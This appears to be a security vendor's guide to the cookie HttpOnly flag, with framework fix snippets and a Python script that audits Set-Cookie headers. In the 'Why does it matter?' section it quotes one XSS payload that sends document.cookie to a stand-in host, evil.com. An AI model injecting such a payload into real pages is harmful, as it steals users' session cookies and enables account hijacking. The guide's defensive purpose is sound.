
Cookie HttpOnly.

Security Headers & TLS Config

Prevents JavaScript from reading cookies — blocks XSS session theft

What does this check test?

The `HttpOnly` flag is a cookie attribute that prevents client-side JavaScript from accessing the cookie via `document.cookie`. When set, the cookie is only sent in HTTP requests to the server and cannot be read, modified, or deleted by scripts running in the browser. This applies to both first-party scripts and any third-party JavaScript loaded on the page, including injected XSS payloads.

Why does it matter?

The most common goal of an XSS attack is to steal session cookies. An attacker who injects `<script>fetch('https://evil.com?c='+document.cookie)</script>` can exfiltrate every non-HttpOnly cookie in scope for the page to their server, then replay them to hijack the victim's session from anywhere. The HttpOnly flag blocks this exfiltration: even if an XSS vulnerability exists in your application, the injected script cannot read the cookie value. It does not neutralise the XSS itself. A script running in the page can still make authenticated requests from the victim's browser, because the browser attaches HttpOnly cookies to those requests automatically. HttpOnly therefore removes the easy, durable form of session hijacking (carrying the token off-site), not the ability to act as the user while the payload runs, so it complements rather than replaces fixing the injection.

Who is affected?

Every application that uses cookies for authentication or session management must set HttpOnly on session cookies and authentication tokens: session IDs, JWTs stored in cookies, "remember me" tokens, and any cookie containing sensitive data. CSRF token cookies are the one nuance. If your front end reads the token out of the cookie to echo it in a header (the double-submit pattern), that cookie cannot be HttpOnly; if you want it protected, deliver the token through a hidden form field, a meta tag, or a response body instead. Cookies used exclusively for client-side purposes (e.g., UI preferences or theme settings) may omit HttpOnly if JavaScript needs to read them, but these should never contain sensitive data.

Where does this apply?

The HttpOnly flag is set whenever the cookie is written, either via the `Set-Cookie` HTTP response header or programmatically in your server-side code. Because a later `Set-Cookie` for the same name, domain and path replaces the cookie along with its attributes, the flag must be present on every write, not only at login: session refresh, logout-and-reissue paths, and any middleware or reverse proxy that sets its own cookies. Review all `Set-Cookie` headers in your application and verify that session-related cookies include the `HttpOnly` attribute. In browser DevTools, Application > Cookies shows an HttpOnly column for each cookie.

How to fix it

Set HttpOnly when creating cookies in your application.

Node.js / Express

```js
// Inside an Express route handler; `token` is the session ID your login logic produced
res.cookie('sessionId', token, {
  httpOnly: true,
  secure: true,
  sameSite: 'lax',
  maxAge: 3600000  // Express takes maxAge in milliseconds
});
```

Django (`settings.py`) — enabled by default for session cookies

```python
SESSION_COOKIE_HTTPONLY = True  # default is True
# Default is False. With True, JavaScript can no longer read the csrftoken cookie,
# so AJAX code must take the token from the hidden form field or a template variable.
CSRF_COOKIE_HTTPONLY = True
```

Flask

```python
app.config['SESSION_COOKIE_HTTPONLY'] = True  # default is True
```

Next.js

```ts
// app/api/login/route.ts
import { NextResponse } from 'next/server';

export async function POST(request: Request) {
  // ... authenticate the user and generate `token` (the session ID) here ...
  const response = NextResponse.json({ success: true });
  response.cookies.set('sessionId', token, {
    httpOnly: true,
    secure: true,
    sameSite: 'lax',
    maxAge: 3600  // Next.js takes maxAge in seconds, not milliseconds
  });
  return response;
}
```

Spring Boot

```properties
# application.properties (container-managed JSESSIONID)
server.servlet.session.cookie.http-only=true
```

Or programmatically, for cookies you create yourself (`jakarta.servlet` on Spring Boot 3, `javax.servlet` on Boot 2):

```java
import jakarta.servlet.http.Cookie;

// Inside a controller method that receives HttpServletResponse response
Cookie cookie = new Cookie("sessionId", token);
cookie.setHttpOnly(true);
cookie.setSecure(true);
response.addCookie(cookie);
```

PHP

```php
// Options-array form requires PHP 7.3 or later
setcookie('sessionId', $token, [
  'httponly' => true,
  'secure' => true,
  'samesite' => 'Lax'
]);
```

Raw `Set-Cookie` header

```http
Set-Cookie: sessionId=abc123; HttpOnly; Secure; SameSite=Lax; Path=/
```

Most session management libraries set HttpOnly by default, but verify this in your framework's configuration. Test by opening the browser console and running `document.cookie`: HttpOnly cookies should not appear in the output, while they remain visible in the DevTools cookie table.
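As an added example (not AppVet's scanner and not code from any of the frameworks above), the following Python script does the header review described under "Where does this apply?" and the verification described just above, from the server side: it parses raw `Set-Cookie` values using the RFC 6265 attribute syntax and reports session-style cookies that lack HttpOnly, Secure or SameSite. The session-name heuristic, the CSRF-cookie exemption and the sample headers are constructed for illustration; `audit_url` fetches a live page with the standard library if you want to point it at your own login endpoint.

```python
"""Audit Set-Cookie headers for HttpOnly (and Secure / SameSite).

Added example for illustration; not AppVet's implementation.
"""
import http.client
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional
from urllib.parse import urlsplit

# Heuristic (assumption): names that usually carry a session or auth token.
SESSION_NAME_PATTERN = re.compile(r"(sess|sid|auth|token|jwt|login|remember)", re.IGNORECASE)
# Double-submit CSRF cookies may legitimately need to be JS-readable, so they are not flagged here.
CSRF_NAME_PATTERN = re.compile(r"(csrf|xsrf)", re.IGNORECASE)


@dataclass
class Cookie:
    name: str
    value: str
    # lower-cased attribute name -> value string, or True for flag attributes such as HttpOnly
    attributes: Dict[str, object] = field(default_factory=dict)

    @property
    def http_only(self) -> bool:
        return "httponly" in self.attributes

    @property
    def secure(self) -> bool:
        return "secure" in self.attributes

    @property
    def same_site(self) -> Optional[str]:
        v = self.attributes.get("samesite")
        return v.lower() if isinstance(v, str) else None


def parse_set_cookie(header_value: str) -> Cookie:
    """Parse one Set-Cookie header value; attribute names are case-insensitive (RFC 6265 5.2)."""
    parts = [p.strip() for p in header_value.split(";")]
    name, sep, value = parts[0].partition("=")
    if not sep:
        raise ValueError(f"malformed cookie pair: {parts[0]!r}")
    cookie = Cookie(name=name.strip(), value=value.strip())
    for attr in parts[1:]:
        if not attr:
            continue
        key, has_value, val = attr.partition("=")
        cookie.attributes[key.strip().lower()] = val.strip() if has_value else True
    return cookie


def looks_like_session_cookie(name: str) -> bool:
    """True for names that look like session/auth cookies, excluding CSRF token cookies."""
    if CSRF_NAME_PATTERN.search(name):
        return False
    return bool(SESSION_NAME_PATTERN.search(name))


def audit_set_cookie_headers(headers: List[str]) -> List[str]:
    """Return one finding per weakness; an empty list means every session-like cookie passed."""
    findings: List[str] = []
    for raw in headers:
        c = parse_set_cookie(raw)
        if not looks_like_session_cookie(c.name):
            continue  # preference cookies may be JS-readable by design
        if not c.http_only:
            findings.append(f"{c.name}: missing HttpOnly (readable via document.cookie)")
        if not c.secure:
            findings.append(f"{c.name}: missing Secure (sent over plaintext HTTP)")
        if c.same_site is None:
            findings.append(f"{c.name}: no SameSite attribute (browser default applies)")
    return findings


def audit_url(url: str, timeout: float = 10.0) -> List[str]:
    """Fetch a URL with the standard library and audit every Set-Cookie header in the response."""
    u = urlsplit(url)
    conn_cls = http.client.HTTPSConnection if u.scheme == "https" else http.client.HTTPConnection
    conn = conn_cls(u.hostname, u.port, timeout=timeout)
    conn.request("GET", u.path or "/", headers={"User-Agent": "cookie-audit-example"})
    resp = conn.getresponse()
    headers = [v for k, v in resp.getheaders() if k.lower() == "set-cookie"]
    conn.close()
    return audit_set_cookie_headers(headers)


# Constructed sample headers (not captured from any real site).
SAMPLE_HEADERS = [
    "sessionId=abc123; HttpOnly; Secure; SameSite=Lax; Path=/",   # fully protected
    "PHPSESSID=9f2c; Path=/; secure",                              # lowercase attr, no HttpOnly
    "theme=dark; Path=/; Max-Age=31536000",                        # preference cookie, skipped
    "auth_token=eyJhbGciOi...; Path=/",                            # no protections at all
]

if __name__ == "__main__":
    for finding in audit_set_cookie_headers(SAMPLE_HEADERS):
        print(finding)
```

Run it against the constructed headers and it reports five findings (two for `PHPSESSID`, three for `auth_token`) and nothing for the correctly configured `sessionId`. Lower-casing attribute names matters: `secure` and `Secure` are the same attribute to a browser, and a naive case-sensitive check would produce a false positive.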


AppVet checks Cookie HttpOnly automatically

Run a free security scan and get a full report with actionable fixes, including a Fix with AI prompt you can paste into any coding tool.
